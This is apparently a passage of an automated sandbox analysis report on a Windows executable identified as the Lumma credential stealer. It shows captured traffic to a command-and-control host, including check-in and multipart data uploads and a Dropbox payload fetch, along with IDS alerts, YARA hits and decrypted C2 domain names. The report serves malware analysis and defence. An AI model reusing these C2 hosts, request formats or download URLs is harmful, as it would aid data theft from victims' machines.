09 b5 e9 97 77 a5 18 68 a7 6a 62 a8 a9 aa 01 f4 d7 bc 25 17 4e a6 6f ec 95 6b b6 18 c0 96 0c 7e 5e 26 80 48 29 fa a1 e9 a3 5e Data Ascii: Z%E\|k[?'6Pbzpqa%c?x}SlV4G@6^Z> ,yYqS.niuS2=qy10^\|60W0`F?&d6lKf3o]8{whjb%Nok~^&H)^
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: 55 67 b8 fc fa 7d f2 30 23 f1 b1 01 0a 05 42 26 32 02 4a 27 32 83 8d aa 7c eb 4e f7 d3 ce 7e 38 3f 70 2e 66 8f 6d d1 d2 ee bd ca 0f 77 94 01 33 47 85 7d b7 ba 51 6c f1 1a cd e9 6f 49 09 7e 63 3f 52 5e fa bf f8 12 11 60 7f f9 97 7d e4 4f e4 c7 d2 a7 f8 08 93 e0 2b b9 fe 4a 0a df cf 2e f8 be 68 a7 ba 9c 1d 08 68 4d 87 9f 45 25 e4 6a 8c 1c f4 f4 3e 7e 89 24 09 8d 8c b5 99 39 2b dc f8 f4 5c 86 a7 bd d5 03 3b fe ba 9e c0 43 4c 5b 57 ec 01 7c c7 f7 8b 8c 7e 49 8d 51 10 8e a6 49 50 bc 6e 62 cd 85 d9 df d5 ed a6 be 4f b4 cb 03 72 b4 f7 8a cf d0 b2 e7 03 9f 0c 6f 03 ce dc d3 76 cf 32 b9 cc d7 19 4b 67 d8 85 bf 4b aa c5 78 9e 77 cb 6d e8 66 33 47 b5 0f bf ae 21 54 75 04 f5 6c cf 7d b9 35 b9 22 fc 62 6a 5d ed 57 dd b3 e3 a7 b3 9d b4 0e 86 b4 28 d0 83 8a 54 45 06 c2 Data Ascii: Ug}0#B&2J'2\|N~8?p.fmw3G}QloI~c?R^`}O+J.hhME%j>~$9+\;CL[W\|~IQIPnbOrov2KgKxwmf3G!Tul}5"bj]W(TE
2025-01-14 07:55:42 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0c9rv2n02skidsb918tgdm25k2; expires=Sat, 10 May 2025 01:42:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6BHMF73aUztmICJp23HmO57%2BCRvc0LhFGAH76ISEniJTkOtun%2FbHY9Frj6uHoA3A5UOZ0lTJ7hp6KQlRDi2v7B2UUWGXKYd2Kt6ell5dFSoOJsrDDMQV6Bl3e92fFVTUpcYkPPS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c10ac7c82728f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2018&rtt_var=761&sent=354&recv=609&lost=0&retrans=0&sent_bytes=2847&recv_bytes=596642&delivery_rate=1434184&cwnd=161&unsent_bytes=0&cid=409e5b2921c4fb51&ts=2035&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:43 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: aleksandr-block.com
2025-01-14 07:55:43 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 26 6a 3d 26 68 77 69 64 3d 37 44 33 43 42 34 45 38 41 37 42 30 38 32 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 Data Ascii: act=get_message&ver=4.0&lid=BbL7Kk--DiFi&j=&hwid=7D3CB4E8A7B08222B960CC18D99B375A
2025-01-14 07:55:43 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t58lei3jmkrldpllmurk85opo7; expires=Sat, 10 May 2025 01:42:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRSK1%2Bxhy9A7n0bLD%2BTzgtUcF1swSy8kBt4cK%2F0PzKGLNBqq9HeE0UKTTlnmP2mWOmyjk1TBY9cE%2BQssbcpEciqqaCfjPPm4oNKFK5B3V1arVlYc8Lys7P2iWTQN3EihF%2FY1Y3Rl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c10bbd9626a5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1628&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=984&delivery_rate=1743283&cwnd=209&unsent_bytes=0&cid=124f0cd8ab2df7a5&ts=453&x=0"
2025-01-14 07:55:43 UTC	240	IN	Data Raw: 66 38 0d 0a 7a 30 37 33 77 33 43 49 64 75 6f 66 30 46 67 77 62 32 75 35 6e 59 30 2b 53 39 55 4e 74 42 32 30 4d 48 6b 4d 70 32 78 4b 42 35 32 55 4e 64 57 32 55 72 4a 55 67 6d 75 6b 4b 45 4e 56 4e 35 62 42 6f 6b 6b 38 6f 69 50 51 62 39 74 41 47 32 50 66 51 69 6c 6f 38 4a 4e 68 68 4b 41 63 31 46 6d 4d 64 6f 78 33 52 42 55 63 6a 61 75 38 54 79 33 68 4f 64 70 38 32 55 63 57 66 4e 55 59 4f 32 36 73 6b 32 47 55 71 78 48 6d 47 49 39 7a 6f 32 77 43 57 7a 54 62 2f 4f 4e 51 4c 71 63 6a 33 6d 33 54 44 77 74 67 7a 41 6b 7a 4f 76 71 6f 4f 59 58 36 52 66 73 61 67 69 62 69 50 67 4a 62 41 64 66 37 35 31 63 35 76 33 54 4f 5a 4d 63 57 43 6e 69 61 56 44 35 2b 35 4c 56 37 6d 50 52 57 37 42 72 58 4c 76 4a 30 45 67 6b 66 6d 36 65 39 Data Ascii: f8z073w3CIduof0Fgwb2u5nY0+S9UNtB20MHkMp2xKB52UNdW2UrJUgmukKENVN5bBokk8oiPQb9tAG2PfQilo8JNhhKAc1FmMdox3RBUcjau8Ty3hOdp82UcWfNUYO26sk2GUqxHmGI9zo2wCWzTb/ONQLqcj3m3TDwtgzAkzOvqoOYX6RfsagibiPgJbAdf751c5v3TOZMcWCniaVD5+5LV7mPRW7BrXLvJ0Egkfm6e9
2025-01-14 07:55:43 UTC	14	IN	Data Raw: 45 6d 6d 77 4c 34 34 74 79 57 30 3d 0d 0a Data Ascii: EmmwL44tyW0=
2025-01-14 07:55:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	162.125.66.18	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:44 UTC	290	OUT	GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: www.dropbox.com
2025-01-14 07:55:45 UTC	4261	IN	HTTP/1.1 302 Found Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com http [TRUNCATED] Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-X1KwI/UNPmezMmfjcL61khhQ7Rs=' 'nonce-OStYmpUFa+BgWTS3CQa6DrbepSM=' Content-Type: text/html; charset=utf-8 Location: https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42HwJO0nTsV79T5KoSu-yl4tDEpx7hZIHIVq4NaQk-v2oYNtVLUO0U-Y08MKArMZNTfDiUmwIYFxkPnAHRbY7ZQs1nLkw8KJm-glI51g0mqSCqlI2ul7jMtRBCzgKWJW/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MjcxNjM4MTYxMzU3MTgzODIwMTkyNTczMDEzODAyNzQ0NjI5NDMz; Path=/; Expires=Sun, 13 Jan 2030 07:55:44 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=s2DJXLqADaaq-43CfIqUtgad; Path=/; Domain=dropbox.com; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=s2DJXLqADaaq-43CfIqUtgad; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=T5SrY5o4DI; Path=/; Expires=Wed, 14 Jan 2026 07:55:44 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 13 Jan 2030 07:55:44 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 14 Jan 2025 07:55:44 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 6d48777500054d1cb3bb2adc4a7563d4 Connection: close
2025-01-14 07:55:45 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	162.125.66.15	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:45 UTC	401	OUT	GET /cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42HwJO0nTsV79T5KoSu-yl4tDEpx7hZIHIVq4NaQk-v2oYNtVLUO0U-Y08MKArMZNTfDiUmwIYFxkPnAHRbY7ZQs1nLkw8KJm-glI51g0mqSCqlI2ul7jMtRBCzgKWJW/file?dl=1# HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com
2025-01-14 07:55:46 UTC	203	IN	HTTP/1.1 400 Bad Request Content-Length: 1005 Content-Type: text/html Vary: Accept-Encoding X-Dropbox-Response-Origin: local Date: Tue, 14 Jan 2025 07:55:45 GMT Server: envoy Connection: close
2025-01-14 07:55:46 UTC	1005	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 400</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Target ID:	0
Start time:	02:55:13
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\k7h8uufe6Y.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\k7h8uufe6Y.exe"
Imagebase:	0x400000
File size:	8'460'624 bytes
MD5 hash:	AFCC99E595001BEA3807D99E9811E94A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2039937644.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00DCDC7C Relevance: 2.4, Strings: 1, Instructions: 1154COMMON

Download Yara Rule

Strings

o, xrefs: 00DCDCA2

Memory Dump Source

Source File: 00000000.00000003.2039858894.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_dc7000_k7h8uufe6Y.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: 8f0e797750ec6e14a9cc73c2c712b8c3a338d2fff0231060d9bdbb64fd689a4e
Instruction ID: 7554652b331888a387543560ae807df90459b07d45509f24ec2dddf414789ae9
Opcode Fuzzy Hash: 8f0e797750ec6e14a9cc73c2c712b8c3a338d2fff0231060d9bdbb64fd689a4e
Instruction Fuzzy Hash: 3112DDA540EBC28FD3038B745D796917FB1AF17214B1E86DBC4C48F0E3D659990AE362

Function 00DCDC7C Relevance: 2.4, Strings: 1, Instructions: 1154COMMON

Download Yara Rule

Strings

o, xrefs: 00DCDCA2

Memory Dump Source

Source File: 00000000.00000003.2039858894.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, Offset: 00DC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_dc7000_k7h8uufe6Y.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: 8f0e797750ec6e14a9cc73c2c712b8c3a338d2fff0231060d9bdbb64fd689a4e
Instruction ID: 7554652b331888a387543560ae807df90459b07d45509f24ec2dddf414789ae9
Opcode Fuzzy Hash: 8f0e797750ec6e14a9cc73c2c712b8c3a338d2fff0231060d9bdbb64fd689a4e
Instruction Fuzzy Hash: 3112DDA540EBC28FD3038B745D796917FB1AF17214B1E86DBC4C48F0E3D659990AE362

Function 00D73B57 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2079463517.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_d73000_k7h8uufe6Y.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a39c55c38bc64707d1595496621c55ce8a8c8cf3b8d388afe3e3f7d242a793ff
Instruction ID: 05e0efb48b879aa031444bb42b025b50cc59086624c0bcb02f9b973e3c27c654
Opcode Fuzzy Hash: a39c55c38bc64707d1595496621c55ce8a8c8cf3b8d388afe3e3f7d242a793ff
Instruction Fuzzy Hash: 592103611092D08FC306CF34D4946817FA2FF8B31639E40DCC8C18F527C2B56942C752

Function 00D73FE9 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2079463517.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, Offset: 00D73000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_d73000_k7h8uufe6Y.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585f620eac74fd4f0a9281876111525aed494d049a520bfcfcc03ac8dd76974e
Instruction ID: 0c61df7dad55f3df854546cefda7fe7e3ea64b2427cae18074ce801d481f820d
Opcode Fuzzy Hash: 585f620eac74fd4f0a9281876111525aed494d049a520bfcfcc03ac8dd76974e
Instruction Fuzzy Hash: E22101651092D58FC317CF34D5A4A917FA1FF8B71639D40DCC9C18E527C2A1A942CB52

Source: https://finickypwk.lat/apiK	Avira URL Cloud: Label: malware
Source: https://miniatureyu.lat/api	Avira URL Cloud: Label: malware

Source: Network traffic	Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.4:53856 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.4:50889 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.4:51038 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.4:55019 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.4:64348 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.4:57981 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.4:51897 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.4:61267 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49733 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 188.114.96.3:443

Source: Joe Sandbox View	IP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 162.125.66.18:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 162.125.66.15:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W91FJIWNPHEMPI21LSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18162Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y37LJYQD8DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8735Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G5EA8LGBPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20382Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LXKDWNMZMX14AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1375Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FJED22COG702CX08User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 594028Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: aleksandr-block.com
Source: global traffic	HTTP traffic detected: GET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42HwJO0nTsV79T5KoSu-yl4tDEpx7hZIHIVq4NaQk-v2oYNtVLUO0U-Y08MKArMZNTfDiUmwIYFxkPnAHRbY7ZQs1nLkw8KJm-glI51g0mqSCqlI2ul7jMtRBCzgKWJW/file?dl=1# HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com

Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: finickypwk.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: savorraiykj.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: kickykiduz.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: miniatureyu.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: leggelatez.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: washyceehsu.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: bloodyswif.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: shoefeatthe.lat
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
